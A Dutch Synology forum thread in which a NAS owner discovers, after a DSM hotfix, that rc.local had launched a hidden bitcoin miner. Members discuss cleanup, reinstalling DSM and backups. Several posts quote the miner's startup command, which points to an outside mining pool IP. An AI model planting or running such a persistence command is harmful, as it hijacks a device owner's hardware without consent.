Synology-Forum.nl
Firmware => Synology DSM 5.1 en eerder => Topic gestart door: JSSL op 22 oktober 2014, 15:41:34
-
Beste forumleden,
Ik heb zojuist ook de NAS geupgrade naar 5.0-4528. Nu kreeg ik na de update een melding dat rc.local is renamed naar rc.local.bak vanwege mogelijke malware.
Ik kan zo snel niks hierover vinden op google.
Iemand enig idee, kan op het moment namelijk nog niet ssh gebruiken i.v.m. het onderweg zijn
Mvg,
Jarno
-
In de releasenotes staat:
This hotfix will remove the current known malware on your Synology NAS.
Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.
Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.
PS. Op geen van mijn Synologies is een rc.local aanwezig.
-
Ben, Bedankt voor je reactie! Ik heb toch maar even met een omweg ssh gebruikt naar de desbetreffende Synology. Wat blijkt, het is nog een bitcoin miner van februari :o
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340
Is het verstandig om DSM opnieuw te installeren met behoud van de bestanden of is dit al voldoende?
-
Dit is wel voldoende om van die miner af te komen maar hij staat nog steeds ergens op je NAS.
Ook begreep ik dat die miner de resource monitor verving om geen 100% cpu te tonen.
Persoonlijk zou ik DSM er opnieuw opzetten, maar kan natuurlijk niet zien hoeveel ongemak dat voor jou oplevert.
-
Ik heb nog gezocht naar de bekende mappen die met deze bitcoinminer er moesten zijn. Daarnaast is er ook geen proces te zien die mined. Net of dit alles al is verwijderd door Synology's update..
-
Dat zeggen ze eigenlijk wel he.
-
Net of dit alles al is verwijderd door Synology's update..
Mooi plus punt van deze update ;D
-
Als ik DSM er opnieuw op zet, kan ik dan alle instellingen terug zetten met de configuration backup? En werkt het dan eigenlijk hetzelfde als nu? Nog geen ervaring met de synology resetten namelijk :lol:
Synology is namelijk zelf niet zeker in hoeverre het na de update verwijderd is..
-
Je kunt inderdaad de configuratie backuppen en dan na herinstallatie van DSM terugzetten. Dit werkt alleen niet voor de packages, die moet je opnieuw installeren en configureren.
Let wel op dat je de procedure uitvoert via de reset-knop en niet via DSM->Terug naar fabrieksinstellingen. Als je de laatste gebruikt wist de NAS ook al je data.
-
Dienen de foto's ook uit de map photo gehaald te worden of overschrijft Photostation die map niet bij het installeren van dat pakket?
-
Nee, data blijft gewoon staan. Het is wel aan te bevelen om een backup te maken voor herinstallatie, het kan tenslotte onverwacht fout gaan (eigenlijk hoor je sowieso een backup van je NAS te hebben). Met de backup functie van de NAS kun je ook de PhotoStation database backuppen. Die kun je dan na herinstallatie terugzetten, dan hoeft PhotoStation niet alles opnieuw te indexeren.
-
In de releasenotes staat:
This hotfix will remove the current known malware on your Synology NAS.
Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.
Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.
PS. Op geen van mijn Synologies is een rc.local aanwezig.
Hallo, ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is. Op mijn systeem bestaat hij. Ik kan me in ieder geval niet herinneren dat ik dit bestand ooit zelf heb aangemaakt. Ik denk dat hij bij de installatie van iPKG meekwam.
Dit staat erin:
#!/bin/sh
# Optware setup
[ -x /etc/rc.optware ] && /etc/rc.optware start
exit 0
Bij mij is de rc.local tijdens de update met rust gelaten. DSM update scant zo te horen dus actief op de inhoud van de rc.local. En dat is een geruststellend idee. ik begin die Syno steeds beter te vinden. :-)
-
DAT is dan weer vreemd, zou hetzelfde verwachten bij jou als wat TS gebeurde. :S
-
Ik heb mijn pst hierboven even aangevuld met een extra opmerking: DSM update scant m.i. op de inhoud van /etc/rc.local, niet op het bestaan van het bestand zelf. De inhoud van mijn rc.local is -zoals je ziet- tamelijk onschuldig.
-
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.
-
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.
In een draadje ergens hierboven zegt JSSL
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340
/var/run/httpd-log.pid is een verwijzing naar Miner software.
-
Overheen gekeken dus... :oops:
DAT is inderdaad een zeer goede reden voor DSM om die te renamen. 8)
-
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.
Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.
Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.
-
ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.
Misschien niet ongebruikelijk, maar bij TS staat er:
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340
En vooral de link naar: 93.174.95.67 is verdacht. En als ik dat IP bekijk, dan behoort hij tot :"Ecatel Ltd, P.o.box 19533, 2500 Cm Den Haag, Netherlands"
Ik weet niet wat dat voor firma is, maar van de laatste 5 SSH aanvallen op mijn NAS kwamen er 3 vanaf een IP adres dat tot Ecatel behoort. (Ik heb al 3 IP reeksen van die firma geblokkeerd).
-
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.
Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.
Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.
Als een check wordt gedaan op de aanwezigheid van de string httpd-log.pid in het bestand, wordt de rc.local aan de kant gezet, ongeacht wat er verder nog in staat, want zo belangrijk is dat bestand verder niet.
Ik vind je overweging m.b.t. wel of niet rc.local op een Syno eerlijk gezegd verder niet zo spannend.
Ik maak me er meer zorgen over dat een externe partij in staat is om root te krijgen op een Syno systeem, want dan kan je overal en altijd grapjes uithalen, niet alleen in de /etc/rc.local.
-
ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.
Niet ongebruikelijk, maar bij TS staat er:
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340
ja Briolet, dat had ik gezien. :idea:
-
@Birdy, zie de 3e post van dit topic. ;)